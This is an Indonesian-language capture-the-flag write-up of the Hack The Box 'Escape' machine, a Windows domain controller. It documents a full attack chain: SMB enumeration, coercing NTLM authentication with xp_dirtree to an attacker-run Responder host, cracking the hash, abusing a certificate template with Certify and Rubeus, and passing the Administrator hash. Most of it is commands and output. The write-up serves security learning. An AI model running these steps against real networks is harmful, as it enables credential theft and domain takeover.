Information Gathering
Port Scanning
nmap -sV -sC 10.10.11.202 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-22 18:19 WIB
Stats: 0:00:52 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 91.67% done; ETC: 18:20 (0:00:04 remaining)
Nmap scan report for 10.10.11.202
Host is up (0.040s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-22 19:20:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2022-11-18T21:05:34
|_Not valid after: 2023-11-18T21:05:34
|_ssl-date: 2024-05-22T19:21:56+00:00; +8h00m35s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2022-11-18T21:05:34
|_Not valid after: 2023-11-18T21:05:34
|_ssl-date: 2024-05-22T19:21:57+00:00; +8h00m35s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.202:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.10.11.202:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2024-05-22T19:21:56+00:00; +8h00m35s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-05-22T19:19:13
|_Not valid after: 2054-05-22T19:19:13
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-05-22T19:21:56+00:00; +8h00m35s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2022-11-18T21:05:34
|_Not valid after: 2023-11-18T21:05:34
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2022-11-18T21:05:34
|_Not valid after: 2023-11-18T21:05:34
|_ssl-date: 2024-05-22T19:21:57+00:00; +8h00m35s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 8h00m34s, deviation: 0s, median: 8h00m34s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-05-22T19:21:16
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.19 seconds
SMB Share
smbclient -N -L '\\10.10.11.202'
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Initial Access
pertama mari kita check isi dari smb folder public
, disini terdapat file pdf SQL Server Procedures.pdf
mari kita download
smbclient -N '\\10.10.11.202\public'
get "SQL Server Procedures.pdf"
kita mendapatkan informasi user untuk mssql, mari konek ke mssql dengan impacket-mssqlclient
impacket-mssqlclient sequel.htb/PublicUser:[email protected]
perlu diketahui disini kita tidak memiliki privilege untuk melakukan write edit dan lain sebagainya, namun kita dapat melakukan xp_dirtree untuk mendapatkan NTLM
sudo responder -I tun0
EXEC xp_dirtree ‘\10.10.16.9\share’, 1, 1
[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:24a0e9d2e62c88bf:CEC760E0B75CB608B5DEC895062D5F65:010100000000000080836C9076ACDA013B4DBC74F2F7EC080000000002000800420039005800330001001E00570049004E002D004B00310030004E004B0032003800520056003100460004003400570049004E002D004B00310030004E004B003200380052005600310046002E0042003900580033002E004C004F00430041004C000300140042003900580033002E004C004F00430041004C000500140042003900580033002E004C004F00430041004C000700080080836C9076ACDA0106000400020000000800300030000000000000000000000000300000EA3401321018152F913B574F7134D6A890622D7DB11164A5CC67DD1D46B0FE090A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0039000000000000000000
selanjutnya mari kita crack dengan hashcat
hashcat hash /usr/share/wordlists/rockyou.txt
...
SQL_SVC::s....000000000000:REGGIE1234ronnie
...
kita mendapatkan password untuk SQL_SVC yaitu REGGIE1234ronnie, selanjutnya mari kita coba remote dengan Evil-WINRM
evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie
Privilege Escalation
pada file C:\sqlserver\logs\ERRORLOG.BAK kita akan mendapatkan kredensial dari Ryan.Cooper
...
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
...
mari kita coba untuk remote access dengan evil-winrm
evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p NuclearMosquito3
Privilege Escalation
kita akan menggunakan certify untuk mencari misconfiguration pada active directory
selanjutnya mari kita jalankan certify.exe
certify.exe find /vulnerable
..
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
...
certify memberikan informasi vulnerability pada certificate template UserAuthentication
, sehingga kita dapat melakukan abuse
.\certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator
simpan output private dan public key lalu kita convert ke .pfx
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx (blak password)
selanjutnya upload cert.pfx tadi ke mesin dan rubeus kemudian jalankan perintah berikut ini untuk mendapatkan NTLM administrator
.\rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
...
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE
...
selanjutnya mari kita pass the hash
evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE